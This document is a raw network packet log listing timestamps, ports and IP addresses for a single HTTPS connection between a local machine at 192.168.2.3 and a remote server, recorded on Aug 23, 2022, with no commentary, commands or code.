Aug 23, 2022 18:24:46.605237007 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.605253935 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.605552912 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.605695963 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.605729103 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.606590033 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.606618881 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.606781960 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.606801987 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.608989000 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.609018087 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.609034061 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.609051943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.609338999 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.609360933 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.611148119 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.611176014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.611191988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.611208916 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.613126040 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.613156080 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.613173962 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.613190889 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.614423990 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.614454031 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.614471912 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.614490032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.616605043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.616631031 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.616647959 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.616667032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.618232012 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.618261099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.618278027 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.618294001 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.620081902 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.620110035 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.620126963 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.620141983 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.621115923 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.621141911 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.621159077 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.621175051 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.623250008 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.623281956 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.623302937 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.623323917 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.625010014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.625041008 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.625057936 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.625075102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.626216888 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.626245022 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.626261950 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.626279116 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.628458023 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.628480911 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.628498077 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.628516912 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.629978895 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.630004883 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.630022049 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.630038023 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.631560087 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.631587029 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.631604910 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.631619930 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.633260012 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.633285999 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.633302927 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.633318901 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.635145903 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.635173082 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.635190964 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.635207891 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.636277914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.636302948 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.636320114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.636337996 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.683798075 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.684554100 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.704572916 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.704622984 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.705538034 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.705568075 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.705586910 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.705604076 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.707338095 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.707442999 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.707463980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.707479954 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.709409952 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.709438086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.756947994 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.759923935 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.760260105 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.760597944 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.762574911 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.762851000 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.763221025 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.765095949 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.771663904 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.777899981 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.777992964 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.780540943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.780577898 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.780605078 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.780632973 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.782414913 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.782454014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.782483101 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.782510996 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.783448935 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.783512115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.783665895 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.783700943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.785593033 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.785620928 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.786710024 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.787292957 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.792910099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.792936087 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.793328047 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.795248032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.795277119 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.797759056 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.797780991 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.799654961 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.799676895 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.802772045 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.802793980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.805285931 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.805306911 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.806833982 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.806854963 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.808702946 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.808725119 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.811942101 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.811978102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.813967943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.814001083 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.816744089 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.816781998 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.818871975 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.818906069 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.821398020 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.821438074 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.823875904 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.823911905 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.826842070 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.826879978 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.828748941 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.828795910 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.831727982 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.831762075 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.834148884 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.834180117 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.836088896 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.836127996 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.838501930 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.838543892 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.840945959 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.840991020 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.843585968 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.843630075 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.845827103 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.845871925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.848215103 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.848265886 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.850769043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.850809097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.853373051 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.853434086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.856118917 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.856183052 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.857980013 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.858041048 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.861124039 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.861160040 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.862762928 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.862792015 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.865202904 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.865250111 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.867705107 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.867748976 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.870153904 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.870189905 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.872807026 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.872858047 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.875262022 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.875297070 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.877475023 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.877516985 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.879925966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.879975080 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.882208109 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.882260084 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.884624958 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.884691000 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.887135983 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.887186050 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.889734030 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.889794111 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.892215014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.892268896 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.894774914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.894829988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.898175955 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.898219109 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.899416924 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.899456024 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.902096033 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.902148008 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.904432058 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.904510021 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.906728029 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.906774044 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.908970118 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.909025908 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.911669970 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.911715031 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.912184000 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.914426088 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.914477110 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.916237116 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.916276932 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.919137001 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.919183016 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.921472073 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.921809912 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.922101021 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.922899008 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.923197031 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.923489094 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.924588919 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.928153038 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.928533077 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.929353952 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.932795048 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.932842970 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.935226917 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.935266972 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.937788010 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.937829971 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.940349102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.940404892 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.942578077 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.942625046 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.944727898 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.944789886 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.947419882 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.947470903 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.948955059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.948988914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.952271938 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.952317953 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.954703093 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.954747915 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.957266092 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.957319021 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.959563017 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.959590912 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.962068081 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.962106943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.964369059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.964405060 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.966842890 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.966870070 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.969976902 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.970031977 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.971813917 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.971848965 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.974797964 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.974829912 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.976594925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.976627111 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.979058981 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.979089022 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.981827021 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.981852055 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.984307051 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.984334946 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.986259937 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.986289024 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.988719940 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.988745928 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.991159916 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.991195917 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.993628979 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.993666887 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.996169090 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.996220112 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.998507977 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.998538017 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.000997066 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.001019955 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.003815889 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.003851891 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.005765915 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.005800009 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.008426905 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.008467913 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.010730028 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.010776043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.013005972 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.013055086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.015556097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.015594006 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.018414974 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.018465996 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.020919085 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.020965099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.023320913 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.023395061 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.025846004 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.025947094 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.028201103 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.028264999 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.030716896 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.030761957 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.033893108 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.033936024 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.034933090 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.034970999 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.037508011 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.037549973 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.040045977 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.040095091 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.042270899 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.042316914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.044677019 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.044714928 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.047419071 CEST	443	51105	216.58.209.42	192.168.2.3
